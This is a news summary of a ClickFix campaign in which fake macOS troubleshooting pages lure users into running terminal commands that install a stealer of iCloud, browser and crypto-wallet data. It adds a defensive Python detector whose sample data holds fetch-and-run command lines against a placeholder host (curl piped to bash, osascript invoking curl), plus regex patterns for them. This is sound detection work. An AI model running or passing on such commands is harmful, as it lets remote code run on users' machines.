
Fake macOS Troubleshooting Sites Used to Steal iCloud Data in ClickFix Scam

Microsoft security researchers have identified a sophisticated social engineering campaign using the "ClickFix" technique to trick macOS users into executing malicious terminal commands that compromise sensitive personal data.

Key Points

  • Attackers host fake troubleshooting guides on platforms like Medium and Squarespace to lure users into copying malicious terminal commands.
  • Executing these commands bypasses Apple’s Gatekeeper security, allowing malware like Atomic macOS Stealer to infect the system.
  • The malware targets iCloud data, Telegram messages, browser passwords, and private cryptocurrency keys from wallets like Ledger and Trezor.
  • Attackers use fileless methods, including curl and osascript, to run malicious code directly in memory, which complicates detection by traditional file-scanning antivirus.
  • Apple introduced a security update in macOS 26.4 that blocks suspicious terminal commands and displays a "Possible malware" warning to users.
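The fileless pattern described above (a downloader piped into a shell, or an inline osascript call) leaves little on disk, but it does leave a process command line in EDR or audit telemetry. The following is an added example, not code from the article, from Microsoft, or from Apple's macOS 26.4 check: a small set of heuristics run over constructed sample command lines to flag the shapes a ClickFix lure typically asks the victim to paste. The sample records and the indicator names are constructed for illustration.

```python
import re

# Constructed sample process-launch records (not taken from the article):
# each is a command line as a macOS endpoint sensor might report it.
SAMPLE_COMMAND_LINES = [
    "curl -fsSL https://example.invalid/fix.sh | bash",
    "osascript -e 'do shell script \"curl -s https://example.invalid/p | sh\"'",
    "/bin/bash -c \"$(curl -s https://example.invalid/install)\"",
    "curl -O https://example.invalid/report.pdf",
    "osascript ~/Scripts/backup.scpt",
    "brew update && brew upgrade",
]

# Indicator 1: curl/wget output piped straight into a shell (nothing written to disk).
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z|k)?sh\b")
# Indicator 2: a shell evaluating downloader output via command substitution.
SUBST_TO_SHELL = re.compile(r"\b(ba|z)?sh\b.*-c.*\$\(\s*(curl|wget)\b")
# Indicator 3: osascript given inline script text with -e rather than a file.
INLINE_OSASCRIPT = re.compile(r"\bosascript\b.*\s-e\s")


def classify(cmdline: str) -> list[str]:
    """Return the ClickFix-style indicators present in one command line."""
    hits = []
    if PIPE_TO_SHELL.search(cmdline):
        hits.append("downloader_piped_to_shell")
    if SUBST_TO_SHELL.search(cmdline):
        hits.append("downloader_output_evaluated_by_shell")
    if INLINE_OSASCRIPT.search(cmdline):
        hits.append("inline_osascript")
    return hits


def scan(cmdlines: list[str]) -> list[tuple[str, list[str]]]:
    """Keep only the command lines that trip at least one indicator."""
    flagged = []
    for cmdline in cmdlines:
        hits = classify(cmdline)
        if hits:
            flagged.append((cmdline, hits))
    return flagged


if __name__ == "__main__":
    for cmdline, hits in scan(SAMPLE_COMMAND_LINES):
        print(f"{', '.join(hits):45s} {cmdline}")
```

A plain `curl -O` download and an osascript run against a script file are deliberately left unflagged: the signal is not the tool itself but the combination of fetching remote content and handing it directly to an interpreter, which is what the lure pages instruct the user to paste into Terminal.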

Why it Matters

This campaign highlights a growing trend of attackers exploiting user trust to bypass built-in operating system defenses. By tricking individuals into manually executing code, hackers can exfiltrate high-value financial and personal data while remaining undetected by standard security software.
Source: HackRead, published by Deeba Ahmed.